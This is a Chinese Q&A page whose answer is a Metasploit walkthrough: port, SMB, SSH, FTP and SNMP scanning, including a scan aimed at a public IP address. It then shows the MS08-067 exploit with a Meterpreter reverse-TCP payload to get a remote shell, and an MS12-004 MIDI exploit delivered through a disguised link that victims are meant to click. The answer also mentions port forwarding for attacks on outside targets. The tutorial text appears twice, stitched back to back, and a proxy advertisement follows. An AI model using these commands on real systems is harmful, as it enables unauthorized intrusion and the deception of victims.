如何用Metasploit扫描端口
1个回答
展开全部
一、调用Nmap进行扫描
进入msf命令行后直接输入nmap –v –sVip(具体命令和nmap一样)
二、MSF模块扫描
Use auxiliary/scanner/postscan/syn
先用搜索命令搜索有关端口扫描的工具:searchportscan
我们使用Use auxiliary/scanner/postscan/syn
看一下参数配置 showoptions
我们先来设置一下网卡
Set INTERFACE eth0
设置一下扫描的端口,我们这里来扫描80:set PORTS 80
设置扫描目标RHOSTS :set RHOSTS 119.63.37.149
在设置一下线程:set THREADS 100
看一下我们设置好的
这时候我们都设置好了,我们来攻击下,看看效果,用命令run进行攻击
缺点就是扫描的速度有点慢啊
MetaSploit SMB扫描获取系统信息
还是搜索一下smb:searchsmb
这次发现搜出来很多,我们用这个模块
Use auxiliary/scanner/smb/smb_version
看一下需要设置的参数
设定目标ip:set RHOSTS 192.168.188.140
在设置一下线程:set THREAD 10
然后run一下,查看结果
直接扫描出来小伙伴的系统还有主机名,速度不到1s,很快
也可以批量扫描设置批量扫描目标即可 set RHOSTS 192.168.188.50-200
MetaSploit服务识别
我们这里对SSH和FTP进行识别
在这里使用这个模块:use auxiliary/scanner/ssh/ssh_version
然后我们设置一下参数,这里讲设置好的参数截图看一下
Run一下看看结果,其实没有扫出来,好像是屏蔽了,但是用nmap却扫出来了ssh
在试一下ftp,用这个模块:use auxiliary/scanner/ftp/ftp_version
设置下参数
可以看到结果,也没有扫描出来;
MetaSploit SNMP扫描与枚举
搜索一下snmpuse auxiliary/scanner/snmp/snmp_login
看一下他的参数设置
这个参数还是很多的
设定一下目标
然后在run一下
枚举用这个模块
use auxiliary/scanner/snmp/snmp_enum
设置好目标和线程后run一下就可以
MetaSploit远程代码执行
搜索一下08-067,使用这个攻击载荷
use exploit/windows/smb/ms08_067_netapi
同样来看一下参数设置
我们只要设置一下目标就可以,然后我们需要一个载荷来反弹shell
set payload windows/meterpreter/reverse_tcp
然后设置参数
将LHOST 设置为自己的ip(对外攻击不要忘了段口转发)
比如说知道对面的系统是什么版本,可以指定targer,用target查看一下都有什么版本
设置一下目标,假设我们目标机器的系统为10:set target 10
这时候,我们再来看一下其参数设置,发现比以前完备了好多
08-067是不会自动识别系统版本的,但是其他的可以自动识别,所以用其他攻击载荷的时候可以不用设置
然后输入exploit进行攻击即可
这时候会出来一个meterpreter>
我们在里面输入shell,就会反弹一个shell
这样整个攻击过程就完成了
MetaSploit MIDI文件解析远程代码执行
还是来搜索12-004
设置下本机ip set SRVHOST ip
然后攻击
会生成一个连接,但是这个链接容易让人发现,所以我们可以伪装下ip利用URIPATH参数就可以伪装
在设置时,会发现报红,因为4444端口被占用了,所以我们改下监听端口 set LPORT 5555
然后生成连接
只要目标点了这个链接,那么我们就会上线一个shell
说一下,目标点击后我们这边并没有反映,我们需要输下session查看当前会话,会找到上线的机子,连接上线的机子
Session –I 1(id)
然后输入shell就可以拿到shell
进入msf命令行后直接输入nmap –v –sVip(具体命令和nmap一样)
二、MSF模块扫描
Use auxiliary/scanner/postscan/syn
先用搜索命令搜索有关端口扫描的工具:searchportscan
我们使用Use auxiliary/scanner/postscan/syn
看一下参数配置 showoptions
我们先来设置一下网卡
Set INTERFACE eth0
设置一下扫描的端口,我们这里来扫描80:set PORTS 80
设置扫描目标RHOSTS :set RHOSTS 119.63.37.149
在设置一下线程:set THREADS 100
看一下我们设置好的
这时候我们都设置好了,我们来攻击下,看看效果,用命令run进行攻击
缺点就是扫描的速度有点慢啊
MetaSploit SMB扫描获取系统信息
还是搜索一下smb:searchsmb
这次发现搜出来很多,我们用这个模块
Use auxiliary/scanner/smb/smb_version
看一下需要设置的参数
设定目标ip:set RHOSTS 192.168.188.140
在设置一下线程:set THREAD 10
然后run一下,查看结果
直接扫描出来小伙伴的系统还有主机名,速度不到1s,很快
也可以批量扫描设置批量扫描目标即可 set RHOSTS 192.168.188.50-200
MetaSploit服务识别
我们这里对SSH和FTP进行识别
在这里使用这个模块:use auxiliary/scanner/ssh/ssh_version
然后我们设置一下参数,这里讲设置好的参数截图看一下
Run一下看看结果,其实没有扫出来,好像是屏蔽了,但是用nmap却扫出来了ssh
在试一下ftp,用这个模块:use auxiliary/scanner/ftp/ftp_version
设置下参数
可以看到结果,也没有扫描出来;
MetaSploit SNMP扫描与枚举
搜索一下snmpuse auxiliary/scanner/snmp/snmp_login
看一下他的参数设置
这个参数还是很多的
设定一下目标
然后在run一下
枚举用这个模块
use auxiliary/scanner/snmp/snmp_enum
设置好目标和线程后run一下就可以
MetaSploit远程代码执行
搜索一下08-067,使用这个攻击载荷
use exploit/windows/smb/ms08_067_netapi
同样来看一下参数设置
我们只要设置一下目标就可以,然后我们需要一个载荷来反弹shell
set payload windows/meterpreter/reverse_tcp
然后设置参数
将LHOST 设置为自己的ip(对外攻击不要忘了段口转发)
比如说知道对面的系统是什么版本,可以指定targer,用target查看一下都有什么版本
设置一下目标,假设我们目标机器的系统为10:set target 10
这时候,我们再来看一下其参数设置,发现比以前完备了好多
08-067是不会自动识别系统版本的,但是其他的可以自动识别,所以用其他攻击载荷的时候可以不用设置
然后输入exploit进行攻击即可
这时候会出来一个meterpreter>
我们在里面输入shell,就会反弹一个shell
这样整个攻击过程就完成了
MetaSploit MIDI文件解析远程代码执行
还是来搜索12-004
设置下本机ip set SRVHOST ip
然后攻击
会生成一个连接,但是这个链接容易让人发现,所以我们可以伪装下ip利用URIPATH参数就可以伪装
在设置时,会发现报红,因为4444端口被占用了,所以我们改下监听端口 set LPORT 5555
然后生成连接
只要目标点了这个链接,那么我们就会上线一个shell
说一下,目标点击后我们这边并没有反映,我们需要输下session查看当前会话,会找到上线的机子,连接上线的机子
Session –I 1(id)
然后输入shell就可以拿到shell
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
Storm代理
2023-07-25 广告
2023-07-25 广告
StormProxies是一家国内优质海外HTTP代理商,拥有一个庞大的IP资源池,覆盖200多个地区,IP数量大且匿名度高。其优点还包括超高并发、稳定高效、技术服务等特点,同时提供HTTP、HTTPS以及SOCKS5协议支持。此外,Sto...
点击进入详情页
本回答由Storm代理提供
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询